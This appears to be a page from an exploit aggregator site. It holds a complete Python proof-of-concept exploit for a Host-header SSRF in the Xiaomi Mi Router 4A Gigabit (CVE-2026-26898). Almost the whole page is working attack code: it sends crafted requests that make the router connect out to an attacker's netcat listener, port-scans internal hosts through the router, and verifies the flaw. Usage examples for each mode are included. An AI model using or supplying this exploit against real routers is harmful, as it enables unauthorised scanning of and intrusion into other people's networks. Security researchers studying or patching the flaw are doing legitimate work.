# 5585 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / xiaomi_ssrf_exploit.py PY
#!/usr/bin/env python3
"""
Xiaomi Mi Router 4A Gigabit - SSRF Exploit (CVE-2026-26898)
============================================================
Vulnerability: Host Header Injection leading to Server-Side Request Forgery
Affected: Xiaomi Mi Router 4A Gigabit Edition, Firmware 3.0.24 (and likely others)
Author: Ahmet Mersin
Date: 2026-01-15

Description:
    The Xiaomi Router's web interface (LuCI/Nginx) fails to validate the HTTP Host 
    header. When a request is made to /cgi-bin/luci/api/xqsystem/login, the router 
    uses the Host header value to make outbound requests, allowing an attacker to:
    
    1. Force the router to connect to arbitrary IP:Port combinations
    2. Scan internal networks using the router as a proxy
    3. Potentially exfiltrate data or attack internal services
    4. Chain with other vulnerabilities for Remote Code Execution

Usage:
    # Start listener first:
    nc -lvnp 4444
    
    # Run exploit:
    python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --callback YOUR_IP --port 4444

    # Scan internal ports:
    python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --scan 192.168.31.1 --ports 22,23,80,443,8080
"""

import requests
import socket
import threading
import argparse
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

class XiaomiSSRFExploit:
    """Proof-of-concept client for the Host-header SSRF on the router web UI.

    Every request goes to ``http://<target_ip>/cgi-bin/luci/api/xqsystem/login``
    with a caller-chosen ``Host: <ip>:<port>`` header.

    Attributes:
        target_ip: Address of the router the requests are sent to.
        timeout: Timeout in seconds handed to ``requests.get``.
        vuln_endpoint: Path of the endpoint that receives the crafted header.
    """

    # A delivered probe slower than this many seconds is classified as "open".
    DEFAULT_SLOW_THRESHOLD = 1.5
    # Local TCP port on which check_vulnerability() waits for the call-back.
    DEFAULT_TEST_PORT = 44444

    def __init__(self, target_ip, timeout=3):
        self.target_ip = target_ip
        self.timeout = timeout
        self.vuln_endpoint = "/cgi-bin/luci/api/xqsystem/login"

    def send_ssrf(self, callback_ip, callback_port):
        """Send one GET request whose Host header is ``callback_ip:callback_port``.

        Returns:
            A ``(success, detail)`` tuple:

            * ``(True, <HTTP status code>)`` when the router answered.
            * ``(True, "TIMEOUT")`` when the request was delivered but no
              answer arrived within ``self.timeout``.
            * ``(False, <error text>)`` when the request failed, including
              the case where the router itself could not be reached in time.
        """
        url = f"http://{self.target_ip}{self.vuln_endpoint}"
        headers = {
            "Host": f"{callback_ip}:{callback_port}",
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
            "Accept": "*/*",
            "Connection": "close"
        }

        try:
            response = requests.get(url, headers=headers, timeout=self.timeout, allow_redirects=False)
        except requests.exceptions.ConnectTimeout as e:
            # ConnectTimeout is also a Timeout, so it must be handled first:
            # the TCP connection to the router never completed, which means
            # the payload was never delivered and this is a plain failure.
            return False, str(e)
        except requests.exceptions.Timeout:
            return True, "TIMEOUT"  # Timeout often means connection was made
        except Exception as e:
            # Deliberate best-effort: any other failure is reported to the
            # caller as text instead of aborting a scan half-way through.
            return False, str(e)
        return True, response.status_code

    def callback_exploit(self, callback_ip, callback_port):
        """Send a single payload pointing at ``callback_ip:callback_port``.

        Prints progress information and returns the success flag reported by
        :meth:`send_ssrf`.
        """
        print(f"\n[*] Target Router: {self.target_ip}")
        print(f"[*] Callback Server: {callback_ip}:{callback_port}")
        print(f"[*] Vulnerable Endpoint: {self.vuln_endpoint}")
        print("-" * 50)

        print(f"[!] Make sure you have a listener running:")
        print(f"    nc -lvnp {callback_port}")
        print("-" * 50)

        print("[*] Sending SSRF payload...")
        success, result = self.send_ssrf(callback_ip, callback_port)

        if success:
            print(f"[+] Request sent successfully (Status/Result: {result})")
            print(f"[+] Check your listener for incoming connection from {self.target_ip}")
        else:
            print(f"[-] Request failed: {result}")

        return success

    @staticmethod
    def _is_open_signal(success, result, elapsed, slow_threshold):
        """Classify one probe; True means the timing suggests an open port.

        A probe that was never delivered (``success`` is False) carries no
        information about the scanned port, however long it took, so it is
        never counted as open.
        """
        if not success:
            return False
        return result == "TIMEOUT" or elapsed > slow_threshold

    def port_scan(self, scan_target, ports, slow_threshold=DEFAULT_SLOW_THRESHOLD):
        """Probe each port of ``scan_target`` through the router, one at a time.

        Detection is timing based: a fast answer is read as "closed", a slow
        answer or a read timeout as "open".

        Args:
            scan_target: Host placed in the Host header.
            ports: Iterable of port numbers to probe.
            slow_threshold: Seconds above which a delivered probe counts as
                open (default 1.5).

        Returns:
            The list of ports classified as open, in probing order.
        """
        print(f"\n[*] SSRF Port Scanner")
        print(f"[*] Router (Proxy): {self.target_ip}")
        print(f"[*] Scan Target: {scan_target}")
        print(f"[*] Ports: {ports}")
        print("-" * 50)

        open_ports = []
        closed_ports = []
        failed_ports = []

        for port in ports:
            sys.stdout.write(f"\r[*] Scanning port {port}...")
            sys.stdout.flush()

            # monotonic() is immune to wall-clock adjustments during the probe.
            start_time = time.monotonic()
            success, result = self.send_ssrf(scan_target, port)
            elapsed = time.monotonic() - start_time

            if self._is_open_signal(success, result, elapsed, slow_threshold):
                open_ports.append(port)
                print(f"\r[+] Port {port}: OPEN (response time: {elapsed:.2f}s)")
            elif success:
                closed_ports.append(port)
            else:
                failed_ports.append(port)

        print("\n" + "=" * 50)
        print("[*] Scan Results:")
        print(f"    Open ports: {open_ports if open_ports else 'None detected'}")
        print(f"    Closed/Filtered: {len(closed_ports)} ports")
        if failed_ports:
            print(f"    Probe errors (request to router failed): {failed_ports}")

        return open_ports

    def check_vulnerability(self, test_port=DEFAULT_TEST_PORT):
        """Check whether the router connects back to a local TCP listener.

        Opens a listener on ``test_port``, sends a payload pointing at this
        machine, and waits for an inbound connection from the router.

        Args:
            test_port: Local TCP port to listen on (default 44444).

        Returns:
            True if the router connected back; False if it did not or if the
            check could not be set up.
        """
        print(f"\n[*] Checking vulnerability on {self.target_ip}...")

        # connect() on a UDP socket only selects the route; reading the socket
        # names back yields the local address used to reach the router and
        # the router's resolved address.
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
                probe.connect((self.target_ip, 80))
                local_ip = probe.getsockname()[0]
                router_ip = probe.getpeername()[0]
        except OSError as exc:
            print(f"[-] Could not determine a local address for reaching {self.target_ip}: {exc}")
            return False

        print(f"[*] Local IP: {local_ip}")
        print(f"[*] Test Port: {test_port}")

        listener_ready = threading.Event()
        connection_received = threading.Event()
        listener_state = {"error": None}

        def listener():
            try:
                with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
                    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                    sock.bind(('0.0.0.0', test_port))
                    sock.listen(1)
                    listener_ready.set()

                    # Keep accepting until the router shows up or 5 seconds
                    # pass, so an unrelated connection cannot end the check.
                    deadline = time.monotonic() + 5
                    while not connection_received.is_set():
                        remaining = deadline - time.monotonic()
                        if remaining <= 0:
                            break
                        sock.settimeout(remaining)
                        conn, addr = sock.accept()
                        with conn:
                            if addr[0] == router_ip:
                                connection_received.set()
            except socket.timeout:
                pass  # nobody connected before the deadline
            except OSError as exc:
                listener_state["error"] = exc
            finally:
                # Unblock the caller even when bind()/listen() failed.
                listener_ready.set()

        # Start listener thread
        t = threading.Thread(target=listener)
        t.daemon = True
        t.start()

        started = listener_ready.wait(timeout=2)
        if not started or listener_state["error"] is not None:
            reason = listener_state["error"] or "listener did not start in time"
            print(f"[-] Could not start callback listener on port {test_port}: {reason}")
            return False

        # Send SSRF
        success, result = self.send_ssrf(local_ip, test_port)
        if not success:
            print(f"[!] SSRF request to router failed: {result}")

        # Wait for the call-back, returning as soon as it is seen.
        if connection_received.wait(timeout=3):
            print(f"[+] VULNERABLE! Router connected back to {local_ip}:{test_port}")
            return True

        print("[-] Could not confirm vulnerability (no callback received)")
        print("    This may be due to firewall or network configuration")
        return False


def _parse_port(value):
    """argparse ``type=`` callable: parse one TCP port in the range 1-65535."""
    try:
        port = int(value)
    except ValueError:
        raise argparse.ArgumentTypeError(f"invalid port: {value!r}") from None
    if not 1 <= port <= 65535:
        raise argparse.ArgumentTypeError(f"port out of range (1-65535): {port}")
    return port


def _parse_port_list(value):
    """argparse ``type=`` callable: parse a comma-separated list of ports.

    Empty items (for example from a trailing comma) are ignored; a list with
    no ports at all is rejected.
    """
    ports = [_parse_port(token.strip()) for token in value.split(",") if token.strip()]
    if not ports:
        raise argparse.ArgumentTypeError("no ports given")
    return ports


def main():
    """Command-line entry point: print the banner, parse arguments, dispatch.

    Exactly one action runs, chosen in this order: ``--check``, ``--callback``,
    ``--scan``. With no action the help text is printed. Invalid port values
    are rejected by argparse with a usage error (exit status 2).
    """
    banner = """
    ╔═══════════════════════════════════════════════════════════════╗
    ║     Xiaomi Mi Router 4A Gigabit - SSRF Exploit                ║
    ║     CVE-2026-26898 (Host Header Injection)                    ║
    ╚═══════════════════════════════════════════════════════════════╝
    """
    print(banner)

    parser = argparse.ArgumentParser(
        description="Xiaomi Router 4A SSRF Exploit via Host Header Injection",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  Verify vulnerability:
    python3 %(prog)s --target 192.168.31.1 --check

  Callback exploit (start nc -lvnp 4444 first):
    python3 %(prog)s --target 192.168.31.1 --callback 192.168.31.100 --port 4444

  Internal port scan:
    python3 %(prog)s --target 192.168.31.1 --scan 192.168.31.1 --ports 22,23,80,443,8080
        """
    )

    parser.add_argument("--target", "-t", required=True,
                       help="IP address of vulnerable Xiaomi Router")
    parser.add_argument("--check", "-c", action="store_true",
                       help="Check if target is vulnerable")
    parser.add_argument("--callback", "-b",
                       help="Your IP for callback (SSRF demonstration)")
    parser.add_argument("--port", "-p", default="4444", type=_parse_port,
                       help="Callback port (default: 4444)")
    parser.add_argument("--scan", "-s",
                       help="Target IP to scan using SSRF")
    # argparse also runs string defaults through ``type``, so args.ports is
    # always a list of ints.
    parser.add_argument("--ports", default="21,22,23,25,80,443,8080,8443",
                       type=_parse_port_list,
                       help="Ports to scan (comma-separated)")
    parser.add_argument("--timeout", default=3, type=int,
                       help="Request timeout in seconds")

    args = parser.parse_args()

    if not (args.check or args.callback or args.scan):
        parser.print_help()
        return

    exploit = XiaomiSSRFExploit(args.target, args.timeout)

    if args.check:
        exploit.check_vulnerability()
    elif args.callback:
        exploit.callback_exploit(args.callback, args.port)
    else:
        exploit.port_scan(args.scan, args.ports)

# Run the command-line interface only when this file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()